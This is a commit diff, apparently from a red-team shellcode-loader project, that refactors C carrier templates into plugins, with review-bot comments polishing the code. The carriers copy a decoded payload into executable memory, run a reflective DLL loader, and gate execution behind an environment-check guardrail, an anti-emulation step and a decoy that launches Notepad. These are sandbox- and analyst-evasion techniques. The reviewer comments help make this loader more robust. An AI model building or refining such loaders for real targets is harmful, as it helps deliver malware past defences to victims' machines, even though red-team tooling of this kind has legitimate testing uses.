refactor: fix carrier & templates (modularize)

Dobin Rutishauser
2024-06-17 05:52:56 +02:00
parent 434c099365
commit b5641214e2
10 changed files with 116 additions and 58 deletions
+12 -25
@@ -17,28 +17,25 @@ char *supermega_payload;
{{plugin_antiemulation}} {{plugin_antiemulation}}
{{plugin_decoy}}
{{plugin_executionguardrail}}
int main() int main()
{ {
// Execution Guardrail: Env Check DWORD result;
wchar_t envVarName[] = L"USERPROFILE";
wchar_t tocheck[] = L"C:\\Users\\"; // Call: Execution Guardrail
WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency! if (executionguardrail() != 0) {
DWORD result = GetEnvironmentVariableW(envVarName, buffer, 1024); return 1;
if (result == 0) {
return 6;
}
if (mystrcmp(buffer, tocheck) != 0) {
return 6;
} }
// Depends on plugin_antiemulation // Call: Anti Emulation plugin
antiemulation(); antiemulation();
// Decoy // Call: Decoy plugin
{{plugin_decoy}} decoy();
//WinExec("C:\\windows\\system32\\notepad.exe", 1);
// Allocate 1 // Allocate 1
// char *dest = ... // char *dest = ...
@@ -62,13 +59,3 @@ int main()
return 0; return 0;
} }
int mystrcmp(wchar_t* str1, wchar_t* str2) {
int i = 0;
while (str1[i] != L'\0' && str2[i] != L'\0') {
if (str1[i] != str2[i]) {
return 1;
}
i++;
}
return 0;
}
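Review bot: `DWORD result;` on the first line of the new main() body is a leftover of the env check that this commit moved into executionguardrail(); nothing in the visible lines reads it any more, so the declaration should be dropped (the new main() of the second iat_reuse template in this commit carries the same dead line). main() continues outside the hunk, so a later use cannot be ruled out from here, but the old code's only reader was the GetEnvironmentVariableW result that has moved with the check. The guardrail's specific failure code is also flattened: executionguardrail() returns 6 while main() now reports `return 1;` for any non-zero result; if the exit status is meant to stay distinguishable, `int rc = executionguardrail(); if (rc != 0) { return rc; }` preserves it.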
+15 -13
@@ -11,6 +11,11 @@ char *supermega_payload;
{{plugin_antiemulation}} {{plugin_antiemulation}}
{{plugin_decoy}}
{{plugin_executionguardrail}}
/* iat_reuse_rx /* iat_reuse_rx
Standard IAT reuse shellcode Standard IAT reuse shellcode
@@ -20,11 +25,18 @@ char *supermega_payload;
int main() int main()
{ {
// Depends on plugin_antiemulation DWORD result;
// Call: Execution Guardrail
if (executionguardrail() != 0) {
return 1;
}
// Call: Anti Emulation plugin
antiemulation(); antiemulation();
// Decoy // Call: Decoy plugin
{{plugin_decoy}} decoy();
// Allocate 1 // Allocate 1
// char *dest = ... // char *dest = ...
@@ -48,13 +60,3 @@ int main()
return 0; return 0;
} }
int mystrcmp(wchar_t* str1, wchar_t* str2) {
int i = 0;
while (str1[i] != L'\0' && str2[i] != L'\0') {
if (str1[i] != str2[i]) {
return 1;
}
i++;
}
return 0;
}
@@ -15,11 +15,29 @@ char *supermega_payload;
* does (rw/rx) -> rwx -> rx * does (rw/rx) -> rwx -> rx
*/ */
{{plugin_antiemulation}}
{{plugin_decoy}}
{{plugin_executionguardrail}}
int main() int main()
{ {
DWORD result; DWORD result;
char *dest = supermega_payload; char *dest = supermega_payload;
// Call: Execution Guardrail
if (executionguardrail() != 0) {
return 1;
}
// Call: Anti Emulation plugin
antiemulation();
// Call: Decoy plugin
decoy();
// Note: RWX if carrier and payload are on the same page (or we cant exec copy..) // Note: RWX if carrier and payload are on the same page (or we cant exec copy..)
// can do only RW otherwise? // can do only RW otherwise?
for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) { for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) {
@@ -143,9 +143,29 @@ DWORD_PTR load_dll(LPVOID dllBytes, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
} }
{{plugin_antiemulation}}
{{plugin_decoy}}
{{plugin_executionguardrail}}
int main() int main()
{ {
char* dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE); char* dest = NULL;
// Call: Execution Guardrail
if (executionguardrail() != 0) {
return 1;
}
// Call: Anti Emulation plugin
antiemulation();
// Call: Decoy plugin
decoy();
dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
// FROM supermega_payload[] // FROM supermega_payload[]
// TO dest[] // TO dest[]
@@ -122,8 +122,6 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
for (DWORD i = 0; i < relocationsCount; i++) for (DWORD i = 0; i < relocationsCount; i++)
{ {
relocationsProcessed += sizeof(BASE_RELOCATION_ENTRY); relocationsProcessed += sizeof(BASE_RELOCATION_ENTRY);
// THIZ
if (relocationEntries[i].Type == 0) if (relocationEntries[i].Type == 0)
{ {
continue; continue;
@@ -134,15 +132,11 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
//ReadProcessMemory(GetCurrentProcess(), (LPCVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR), NULL); //ReadProcessMemory(GetCurrentProcess(), (LPCVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR), NULL);
DWORD_PTR* addressToPatch = (DWORD_PTR*)((BYTE*)dllBase + relocationRVA); DWORD_PTR* addressToPatch = (DWORD_PTR*)((BYTE*)dllBase + relocationRVA);
//DWORD_PTR value = *addressToPatch; //DWORD_PTR value = *addressToPatch;
*addressToPatch += deltaImageBase; *addressToPatch += deltaImageBase;
//mymemcpy((PVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR)); //mymemcpy((PVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR));
} }
} }
MessageBoxW(0, L"AAA2", L"AAA2", MB_OK);
// resolve import address table // resolve import address table
PIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL; PIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL;
IMAGE_DATA_DIRECTORY importsDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]; IMAGE_DATA_DIRECTORY importsDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
@@ -187,26 +181,35 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
} }
{{plugin_antiemulation}}
{{plugin_decoy}}
{{plugin_executionguardrail}}
int main() int main()
{ {
// char* dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
//char* dest = VirtualAlloc(0, 0x7000, 0x3000, PAGE_EXECUTE_READWRITE);
char* dest = supermega_payload; char* dest = supermega_payload;
DWORD protect, oldProtect; DWORD protect, oldProtect;
protect = PAGE_EXECUTE_READWRITE;
VirtualProtect((LPVOID)dest, 0x7000, protect, &oldProtect);
MessageBoxW(0, L"ok virtualprotect", L"AAA2", MB_OK); // Call: Execution Guardrail
if (executionguardrail() != 0) {
return 1;
}
// Call: Anti Emulation plugin
antiemulation();
// Call: Decoy plugin
decoy();
VirtualProtect((LPVOID)dest, 0x7000, PAGE_EXECUTE_READWRITE, &oldProtect);
// FROM supermega_payload[] // FROM supermega_payload[]
// TO dest[] // TO dest[]
// Including decryption // Including decryption
{{ plugin_decoder }} {{ plugin_decoder }}
MessageBoxW(0, L"ok copy", L"AAA2", MB_OK);
// Load the DLL at dest // Load the DLL at dest
DWORD_PTR dllBase; DWORD_PTR dllBase;
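Review bot: `DWORD protect, oldProtect;` leaves `protect` unused in the new code, because the commit removed the `protect = PAGE_EXECUTE_READWRITE;` assignment and now passes the constant straight to VirtualProtect; the declaration should shrink to `DWORD oldProtect;`. main() continues outside the hunk, so this assumes no later reference to `protect` in the rest of the body. The removed MessageBoxW debug calls in this section and in the load_dll hunk above are the commit's own cleanup and need no further action.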
+4
@@ -0,0 +1,4 @@
void decoy() {
// None
}
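Review bot: `void decoy()` declares the function with an unspecified parameter list (old-style C declaration) rather than an empty one; the template should read `void decoy(void) {`, and the same applies to the WinExec decoy template and to both executionguardrail() templates in this commit. The `// None` comment would read better if it stated intent, e.g. `// "none" decoy plugin: intentionally a no-op so the carrier's decoy() call resolves.`.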
+4 -1
@@ -1 +1,4 @@
WinExec("C:\\windows\\system32\\notepad.exe", 1);
void decoy() {
WinExec("C:\\windows\\system32\\notepad.exe", 1);
}
+18
@@ -1,3 +1,18 @@
int mystrcmp(wchar_t* str1, wchar_t* str2) {
int i = 0;
while (str1[i] != L'\0' && str2[i] != L'\0') {
if (str1[i] != str2[i]) {
return 1;
}
i++;
}
return 0;
}
int executionguardrail() {
// Execution Guardrail: Env Check // Execution Guardrail: Env Check
wchar_t envVarName[] = L"USERPROFILE"; wchar_t envVarName[] = L"USERPROFILE";
wchar_t tocheck[] = L"C:\\Users\\"; wchar_t tocheck[] = L"C:\\Users\\";
@@ -9,3 +24,6 @@
if (mystrcmp(buffer, tocheck) != 0) { if (mystrcmp(buffer, tocheck) != 0) {
return 6; return 6;
} }
return 0;
}
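Review bot: mystrcmp() is not a full string comparison: its loop stops at the first terminator of either argument, so `mystrcmp(buffer, tocheck)` succeeds whenever buffer begins with tocheck (a prefix test), and the name hides that. Since the function is new to this file, add a comment above it such as `// Returns 0 when the two strings agree up to the shorter one's terminator (prefix match), 1 at the first differing character.`, and consider `const wchar_t *` for both parameters as neither is written. executionguardrail() should likewise document its contract for carriers, e.g. `// Returns 0 to proceed, non-zero to abort (carriers treat any non-zero as failure).`; its body continues between the two hunks and beyond this one.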
+3
@@ -0,0 +1,3 @@
int executionguardrail() {
// None
}
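Review bot: `int executionguardrail()` in this "none" template falls off the end without a return statement, yet every carrier in this commit evaluates `if (executionguardrail() != 0)`; using the value of a non-void function that returns nothing is undefined behavior in C, so the stub can abort the carrier at random depending on what is left in the return register. The body should be `return 0;` with the comment `// "none" guardrail: always allows execution.`, and the declaration `int executionguardrail(void) {`.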
+1 -1
@@ -67,7 +67,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
'plugin_decoder': plugin_decoder, 'plugin_decoder': plugin_decoder,
'plugin_antiemulation': plugin_antiemualation, 'plugin_antiemulation': plugin_antiemualation,
'plugin_decoy': plugin_decoy, 'plugin_decoy': plugin_decoy,
'plugin_guardrails': plugin_guardrails, 'plugin_executionguardrail': plugin_guardrails,
'PAYLOAD_LEN': payload_len, 'PAYLOAD_LEN': payload_len,
}) })
with open(settings.main_c_path, "w", encoding='utf-8') as file: with open(settings.main_c_path, "w", encoding='utf-8') as file:
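Review bot: The template key was renamed to `'plugin_executionguardrail'` but the local it maps to is still `plugin_guardrails`, so the dictionary no longer reads as key-mirrors-variable the way the neighbouring `'plugin_decoder': plugin_decoder` and `'plugin_decoy': plugin_decoy` entries do; renaming the local (defined outside the hunk) to match, `'plugin_executionguardrail': plugin_executionguardrail,`, keeps the mapping self-describing. The misspelt `plugin_antiemualation` on the line above is pre-existing and would be worth fixing in the same pass. create_c_from_template() starts and ends outside the hunk.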